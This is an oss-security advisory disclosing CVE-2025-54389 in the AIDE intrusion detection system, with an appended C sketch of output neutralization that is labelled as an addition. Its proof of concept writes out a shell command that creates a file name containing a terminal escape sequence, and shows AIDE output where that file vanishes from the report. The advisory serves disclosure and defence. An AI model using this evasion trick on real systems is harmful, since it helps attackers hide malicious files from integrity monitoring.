Message-ID: <20250814140111.GA2@magnesium.vonhaugwitz.com>
Date: Thu, 14 Aug 2025 16:01:11 +0200
From: Hannes von Haugwitz <hannes@...haugwitz.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2025-54389 - aide (<= 0.19.1): improper output neutralization (potential AIDE detection bypass)

Summary
=======

Rajesh Pangare discovered an improper output neutralization vulnerability in
AIDE, an advanced intrusion detection system. An attacker can craft a malicious
filename by including terminal escape sequences to hide the addition or removal
of the file from the report and/or tamper with the log output. A local user
might exploit this to bypass the AIDE detection of malicious files.
Additionally, the output of extended attribute key names and symbolic link
targets is also not properly neutralized.

Project
=======

AIDE (https://aide.github.io)

Affected versions
=================

AIDE <= 0.19.1

CVE ID
======

CVE-2025-54389

Proof of concept
================

    $ mkdir test
    $ touch test/$(echo -e 'malicious-file\033[1A')
    $ touch test/regular-testfile
    $ aide --config <(printf -- "database_in=file:/dev/null\nroot_prefix = ./test\n/ R") --check
    Start timestamp: 2025-08-10 07:23:25 +0000 (AIDE 0.19.1)
    AIDE found differences between database and filesystem!!
    Root prefix: ./test

    Summary:
      Total number of entries:  3
      Added entries:            3
      Removed entries:          0
      Changed entries:          0

    ---------------------------------------------------
    Added entries:
    ---------------------------------------------------

    d++++++++++++++++++: /
    f++++++++++++++++++: /regular-testfile

    ---------------------------------------------------
    The attributes of the (uncompressed) database(s):
    ---------------------------------------------------

    /dev/null
     SHA256    : 47DEQpj8HBSa+/TImW+5JCeuQeRkm5NM
                 pJWZG3hSuFU=
     SHA512    : z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXc
                 g/SpIdNs6c5H0NE8XYXysP+DGNKHfuwv
                 Y7kxvUdBeoGlODJ6+SfaPg==
     STRIBOG256: P1OaIT6XyALMIp1HTGqjKoJaNgsqkzqU
                 n9klII2c4bs=
     STRIBOG512: jpRdogmqhp8EVZKFKbyuRnnphzq3B7VT
                 FfVs65i+8Kc2L3FVKDVu6DzaXyqsTGrS
                 ujpxXBvNgcuOn5C/TBwaig==
     SHA512/256: xnK40e9W7Sirh8NiLFEUBpvdOte4+XN0
                 mNDAHs7wlno=
     SHA3-256  : p//G+L8e12ZRwUdWoGHWYvWA/03kO0n6
                 gtgKS4D4Q0o=
     SHA3-512  : pp9zzKI6msXItWfcGFp1bpfJghZP4lhZ
                 4NHcwUdcgKYVshI68fX5TBHj6UAsOsVY
                 9QAZnZW20+MBdYWGKB3NJg==

    End timestamp: 2025-08-10 07:23:25 +0000 (run time: 0m 0s)

The output correctly shows the addition of `regular-testfile` but misses the
addition of the malicious file. This works because the terminal escape sequence
moves the cursor one line up before the new line character of the regular
output moves the cursor back to the beginning of the line containing the
malicious file; the next added entry then overwrites the line.

Please note that the number of added entries is unchanged in the report. For
this POC a user might notice the difference between the number of added entries
and the list of added entries shown in the report, but with a much higher
number of added files the deviation is likely to be overlooked.

Analysis
========

The vulnerability is caused by missing output neutralization before printing
the filename, symbolic link target or extended attribute key name to the report
and log output. This allows a user to craft a filename, symbolic link target or
extended attribute key name including control characters to tamper with or
overwrite previous output.

Mitigation
==========

Upgrade to AIDE v0.19.2 [v0.19.2]

Alternatively apply one of the provided patches:

    aide-0.19_cve-2025-54389_control_chars.patch for 0.19.1
    aide-0.18_cve-2025-54389_control_chars.patch for 0.18.8 (backported for Debian Bookworm)
    aide-0.17_cve-2025-54389_control_chars.patch for 0.17.4 (backported for Debian Bullseye)

If you cannot upgrade, the issue can be mitigated by configuring AIDE to write
the report output to a regular file (e.g. `report_url=file:/var/log/aide.log`)
or redirecting stdout to a regular file. Additionally consider redirecting the
log output written to `stderr` to a regular file. Make sure to open the
generated files with a program that escapes terminal sequences correctly.

[v0.19.2] https://github.com/aide/aide/releases/tag/v0.19.2

Credit
======

The issue was reported by Rajesh Pangare.

View attachment "aide-0.17_cve-2025-54389_control_chars.patch" of type "text/x-diff" (15255 bytes)
View attachment "aide-0.18_cve-2025-54389_control_chars.patch" of type "text/x-diff" (18647 bytes)
View attachment "aide-0.19_cve-2025-54389_control_chars.patch" of type "text/x-diff" (18339 bytes)
Download attachment "signature.asc" of type "application/pgp-signature" (660 bytes)
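
The kind of output neutralization the Analysis section says was missing, as an added example that is not part of the advisory and is not AIDE's patch: a name is rewritten so that control bytes become visible octal escapes before it reaches the report. The function name `neutralize`, the octal escape format and the UTF-8 locale are assumptions of this sketch.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper (not AIDE's function): return a malloc'd copy of `s`
 * with every terminal control byte replaced by a visible octal escape.
 * The backslash is escaped too, so the encoding stays unambiguous. */
char *neutralize(const char *s)
{
    size_t len = strlen(s);
    char *out = malloc(len * 4 + 1);     /* worst case: each byte -> "\ooo" */
    char *p = out;

    if (out == NULL)
        return NULL;
    for (size_t i = 0; i < len; i++) {
        unsigned c = (unsigned char)s[i];
        unsigned n = (unsigned char)s[i + 1];    /* '\0' at end of string */

        if (c == 0xC2 && n >= 0x80 && n <= 0x9F) {
            /* UTF-8 encoded C1 control (U+0080..U+009F, e.g. CSI U+009B) */
            p += snprintf(p, 9, "\\%03o\\%03o", c, n);
            i++;
        } else if (c < 0x20 || c == 0x7F || c == '\\') {
            /* C0 control (ESC, CR, LF, BS, ...), DEL, or the escape char */
            p += snprintf(p, 5, "\\%03o", c);
        } else {
            *p++ = (char)c;              /* printable ASCII, other UTF-8 */
        }
    }
    *p = '\0';
    return out;
}

int main(void)
{
    /* Constructed sample: the file name from the proof of concept above. */
    char *safe = neutralize("malicious-file\033[1A");

    if (safe == NULL)
        return 1;
    printf("f++++++++++++++++++: /%s\n", safe);
    free(safe);
    return 0;
}
```

With this in place the proof-of-concept entry is printed as a literal `\033[1A` suffix on its own line instead of moving the cursor, so the list of added entries matches the count in the summary.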